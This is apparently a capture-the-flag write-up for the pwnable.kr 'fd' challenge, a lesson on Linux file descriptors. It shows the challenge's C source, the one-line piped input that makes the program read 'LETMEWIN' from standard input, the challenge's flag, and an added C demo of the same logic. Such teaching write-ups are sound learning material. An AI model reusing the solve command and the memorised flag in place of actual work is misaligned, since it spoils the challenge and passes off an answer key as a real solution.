
Pwnable.kr: fd (1 pt)

2016-08-08

Description

Mommy! what is a file descriptor in Linux?
ssh [email protected] -p2222 (pw:guest)

Exploit

fd.c
    #include <stdio.h>
    #include <stdlib.h>
    #include <string.h>
    char buf[32];
    int main(int argc, char* argv[], char* envp[]){
        if(argc<2){
            printf("pass argv[1] a number\n");
            return 0;
        }
        int fd = atoi( argv[1] ) - 0x1234;
        int len = 0;
        len = read(fd, buf, 32);
        if(!strcmp("LETMEWIN\n", buf)){
            printf("good job :)\n");
            system("/bin/cat flag");
            exit(0);
        }
        printf("learn about Linux file IO\n");
        return 0;

    }

The target program reads up to 32 bytes from the file descriptor atoi(argv[1]) - 0x1234 and, if the content equals LETMEWIN\n, prints the flag. To solve the challenge, pass 4660 (0x1234) as the first argument. The descriptor then evaluates to 0, so the program reads from standard input, and we can supply LETMEWIN\n there to get the flag.

$ echo "LETMEWIN" | ./fd 4660
good job :)
mommy! I think I know what a file descriptor is!!

Flag: mommy! I think I know what a file descriptor is!!
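
An added C example, not part of the original write-up or the challenge source: it reproduces fd.c's descriptor arithmetic and comparison, checks the result of read(), and shows why the newline appended by echo matters. The names fd_from_arg, check_fd and check_bytes are hypothetical, and the input bytes are constructed.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

/* Same arithmetic as fd.c: the descriptor number comes from argv[1]. */
static int fd_from_arg(const char *arg) {
    return atoi(arg) - 0x1234;
}

/* The comparison from fd.c, with read()'s result checked.
 * Returns 1 on match, 0 on mismatch, -1 if read() fails (e.g. EBADF). */
static int check_fd(int fd) {
    char buf[32] = {0};
    ssize_t len = read(fd, buf, sizeof buf - 1);  /* keep a NUL terminator */
    if (len < 0)
        return -1;
    return strcmp("LETMEWIN\n", buf) == 0;
}

/* Helper for this demo: deliver constructed bytes through a pipe, the same
 * way the shell's `echo ... |` delivers them on descriptor 0. */
static int check_bytes(const char *data) {
    int p[2];
    if (pipe(p) != 0)
        return -1;
    size_t n = strlen(data);
    int ok = write(p[1], data, n) == (ssize_t)n;
    close(p[1]);
    int result = ok ? check_fd(p[0]) : -1;
    close(p[0]);
    return result;
}

int main(void) {
    printf("4660 -> fd %d\n", fd_from_arg("4660"));
    printf("4661 -> fd %d\n", fd_from_arg("4661"));
    printf("bad fd  -> %d\n", check_fd(fd_from_arg("abc")));
    printf("with \\n -> %d\n", check_bytes("LETMEWIN\n"));
    printf("no \\n   -> %d\n", check_bytes("LETMEWIN"));
    return 0;
}
```

A non-numeric argument makes atoi() return 0, so the descriptor becomes -0x1234 and read() fails; fd.c ignores that failure and falls through to the "learn about Linux file IO" message.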

